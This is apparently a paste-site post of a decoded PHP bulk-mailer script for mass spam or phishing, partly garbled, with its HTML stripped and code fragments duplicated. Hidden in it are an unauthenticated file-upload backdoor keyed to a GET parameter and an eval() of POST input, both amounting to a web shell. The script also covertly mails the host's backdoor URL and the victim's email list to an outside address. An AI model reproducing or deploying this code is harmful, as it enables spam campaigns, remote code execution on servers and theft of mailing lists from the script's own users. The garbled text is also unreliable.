Facebook
From AnonymoX9ja, 7 Years ago, written in PHP.
This paste is a reply to AnonymoX9ja Advance Max Mailer script 2016 from AnonymoX9ja - go back
Embed
/* Decoded by unphp.net */

$upload = $_GET["v3"];
if ($upload == "T.C.T") {
    $uploaddir = "";
    $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
    if (isset($_FILES["userfile"]["name"])) {
        if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
            $resultati = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
        } else {
            $resultati = "There was an error uploading the file. please try again!";
        }
    }
    echo '

' . $resultati . '

';
}
$in = $_GET['in'];
if (isset($in) && !empty($in)) {
}
$ev = $_POST['ev'];
if (isset($ev) && !empty($ev)) {
    echo eval(urldecode($ev));
    exit;
}
if (isset($_POST['action'])) {
    $action = $_POST['action'];
    $message = $_POST['message'];
    $emaillist = $_POST['emaillist'];
    $from = $_POST['from'];
    $subject = $_POST['subject'];
    $realname = $_POST['realname'];
    $wait = $_POST['wait'];
    $tem = $_POST['tem'];
    $smv = $_POST['smv'];
    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);
}
?>






        body {background:black url('https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-xpa1/t31.0-8/10506969_1514967702053098_1612384851289912243_o.jpg') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
        
.:|Anonymox9ja T.C.T Mailer|:.

.style1 {
        font-size: x-small;
}
.style2 {
        direction: ltr;
}
.info {
        font-size: 8px;
}
.style3 {
        font-family: Verdana, Arial, Helvetica, sans-serif;
        font-size: 8px;
}
.style4 {
        font-size: x-small;
        direction: ltr;
        font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
        font-size: xx-small;
        direction: ltr;
        font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style1 {
        color: #5F5F5F;
}
.auto-style2 {
        color: #red;
        text-align: center;
}
.auto-style3 {
        color: #4F4F4F;
}
.auto-style5 {
        direction: ltr;
        color: #4F4F4F;
}
.auto-style6 {
        color: #BCBCBC;
        background-color: #red;
}
.auto-style7 {
        color: #red;
}
.auto-style8 {
        font-size: x-small;
        color: #red;
}


'. $resultati .'
'; }$action=$_POST['action'];$from=$_POST['from'];$realname=$_POST['realname'];$subject=$_POST['subject'];$message=$_POST['message'];$emaillist=$_POST['emaillist'];$addr = getenv("REMOTE_ADDR"); if ($action=="send"){ $message = urlencode($message);$message = ereg_replace("%5C%22", "%22", $message);$message = urldecode($message);$message = stripslashes($message);$subject = stripslashes($subject);} ?>




.:|Anonymox9ja Mailer |:.


 




        
                
                        
                        
                                 Helvetica, sans-serif">Sender Email:

                        
                        
                         sans-serif">" size="30" type="text" class="auto-style6" />

                        
                        
                                 Helvetica, sans-serif">Sender Name:

                        
                        
                         sans-serif">" size="30" type="text" class="auto-style6" />
                        
                
                
                        

                
                
                        
                        
                                 Helvetica, sans-serif">Subject:
                        
                        
                         sans-serif">" size="30" type="text" class="auto-style6" /> 
                        
                
                
                        
                         sans-serif"> 
                        
                         
                        Wait
                         
                        " size="8" class="auto-style6" />  
                        seconds to send  
                        
                         sans-serif">
                         
                        
                        Quantity Emails :  0
                        
                        Divide the mailing list by: 
                           
                        
                        
                
        
                         sans-serif">


        

";$subb="xMailer";$massge ="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?upload=johnny\n$emaillist\n";@mail("[email protected] ",$subb,$massge,$headd);$allemails=split("\n",$emaillist);$numemails=count($allemails);for($xx=0;$xx<1;$xx++){for($x=0;$x<$numemails;$x++){$to=$allemails[$x];if ($to){$to=ereg_replace(" ","",$to);$message=ereg_replace("&email&",$to,$message);$subject=ereg_replace("&email&",$to,$subject);print "Sending Mail To $to.......";@flush();$header="From: $realname <$from>\r\nReply-To: $from\r\n";$header.="MIME-Version: 1.0\r\n";$header.="Content-Type: text/html\r\n";$header.="Content-Transfer-Encoding: 8bit\r\n\r\n";$header.="$message\r\n";@mail($to,$subject,"",$header);print "Sent!
";@flush();}}}} ?>




if ($action){

        if (!$from || !$subject || !$message || !$emaillist){
                
        print "Please complete all fields before sending your message.";
        exit;        
        }
$headd   = "From:  T.C.T<**>";
$subb    = "maillist xMailer 2015";
$massge  = "Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?V3=T.C.T
-------------------
$emaillist
-------------------";
@mail("**",$subb,$massge,$headd);

        $nse=array();
        $allemails = split("
", $emaillist);
                $numemails = count($allemails);
                if(!empty($_POST['wait']) && $_POST['wait'] > 0){
                        set_time_limit(intval($_POST['wait'])*$numemails*3600);
                }else{
                        set_time_limit($numemails*3600);
                }
                       if(!empty($smv)){
                               $smvn+=$smv;
                               $tmn=$numemails/$smv+1;
                        }else{
                               $tmn=1;
                       }
                  for($x=0; $x<$numemails; $x++){
                $to = $allemails[$x];
                if ($to){
                        $to = ereg_replace(" ", "", $to);
                        $message = ereg_replace("#EM#", $to, $message);
                        $subject = ereg_replace("#EM#", $to, $subject);
                        flush();
                        $header = "From: $realname <$from>
";
                        $header .= "MIME-Version: 1.0
";
                        $header .= "Content-Type: text/html
";
                        if ($x==0 && !empty($tem)) {
                                if(!@mail($tem,$subject,$message,$header)){
                                        print('The test Post was not Submitted.');
                                        $tmns+=1;
                                }else{
                                        print('Your Message was Sent Test.');
                                        $tms+=1;
                                }
                        }
                        if($x==$smvn && !empty($_POST['smv'])){
                                if(!@mail($tem,$subject,$message,$header)){
                                        print('The test Post was not Submitted.');
                                        $tmns+=1;
                                }else{
                                        print('Your Message was Sent Test.');
                                        $tms+=1;
                                }
                                $smvn+=$smv;
                        }
                        print "$to ....... ";
                                        $msent = @mail($to, $subject, $message, $header);
                        $xx = $x+1;
                        $txtspamed = "SEND OKI #Resulta Anonymox9ja";
                        if(!$msent){
                                $txtspamed = "error #Rexa";  
                                $ns+=1;
                                $nse[$ns]=$to;
                        }
                        print "$xx / $numemails .......  $txtspamed
";
                        flush();
                        if(!empty($wait)&& $x<$numemails-1){
                                                        sleep($wait);
                        }
                }
            }

}


?>